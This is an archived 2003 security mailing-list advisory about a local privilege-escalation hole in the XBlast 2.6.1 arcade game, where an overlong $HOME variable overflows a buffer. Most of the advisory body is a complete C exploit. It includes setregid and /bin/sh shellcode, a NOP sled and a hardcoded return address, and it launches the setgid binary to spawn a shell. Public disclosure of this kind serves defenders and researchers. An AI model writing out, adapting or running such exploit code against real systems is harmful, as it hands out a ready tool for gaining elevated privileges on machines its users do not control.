[EXPL] XBlast Local Root Exploit

• Previous message: SecuriTeam: "[TOOL] kses, PHP Based HTML Filter"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 28 Jul 2003 14:55:08 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

Get Thawte's New Step-by-Step SSL Guide for Apache.
http://ad.doubleclick.net/clk;5903117;8265118;i

- - - - - - - - -

  XBlast Local Root Exploit
------------------------------------------------------------------------

SUMMARY

" <http://www.xblast-center.com/> XBlast is a multi-player arcade game for
X11R5/R6. The game can be played with at least two players and up to four
players. It was inspired by the video/computer game
Bomberman(Dynablaster), which was to my knowledge first programmed for
NEC's PC Engine/Turbo Grafx. Other (commercial) versions of the original
game exist for IBM-PC, Atari ST, Amiga, NES, GameBoy, and Super NES."

A buffer inside XBlast could be overflowed by passing a long $HOME
environment, this overflow will allow execution of arbitrary code.

DETAILS

Vulnerable Systems:
 * XBlast version 2.6.1

/* 0x333xblast => xblast 2.6.1 local exploit
 *
 * xblast could be overflowed by passing a long $HOME
 * env. For more info read advisory @ :
 *
 * http://www.0x333.org/advisories/outsider-003.txt
 *
 * * note * :
 * exploit tested against xblast-2.6.beta-1.i386.rpm
 * under Red Hat Linux 9.0. xblaste is not install
 * by default +s.
 *
 * coded by c0wboy
 *
 * (c) 0x333 Outsider Security Labs / www.0x333.org
 *
 */

#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define BIN "/usr/X11R6/bin/xblast"
#define SIZE 1032

#define RET 0xbffffb38
#define NOP 0x90

unsigned char shellcode[] =

        /* setregid (20,20) shellcode */
        "\x31\xc0\x31\xdb\x31\xc9\xb3\x14\xb1\x14\xb0\x47"
        "\xcd\x80"

        /* exec /bin/sh shellcode */

        "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
        "\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";

void banner (void);
void memret (char *, int, int, int);

void banner (void)
{
        fprintf (stdout, "\n\n --- xblast local exploit by c0wboy ---\n");
        fprintf (stdout, " --- Outsiders Se(c)urity Labs / www.0x333.org
---\n\n");

        fprintf (stdout, " [NOW PRESS 'y' TO SPAWN THE SHELL]\n\n");
}

void memret (char *buffer, int ret, int size, int align)
{
        int i;
        int * ptr = (int *) (buffer + align);
                                                                           
     
        for (i=0; i<size; i+=4)
                *ptr++ = ret;
                                                                           
     
        ptr = 0x0;
}

int main ()
{
        int ret = RET;
        char out[SIZE];

        memret ((char *)out, ret, SIZE-1, 0);

        memset ((char *)out, NOP, 333);
        memcpy ((char *)out+333, shellcode, strlen(shellcode));

        setenv ("HOME", out, 1);

        banner ();
        execl (BIN, BIN, 0x0);
}

ADDITIONAL INFORMATION

The information was provided by <mailto:c0wboy@tiscali.it> c0wboy

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[TOOL] kses, PHP Based HTML Filter"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]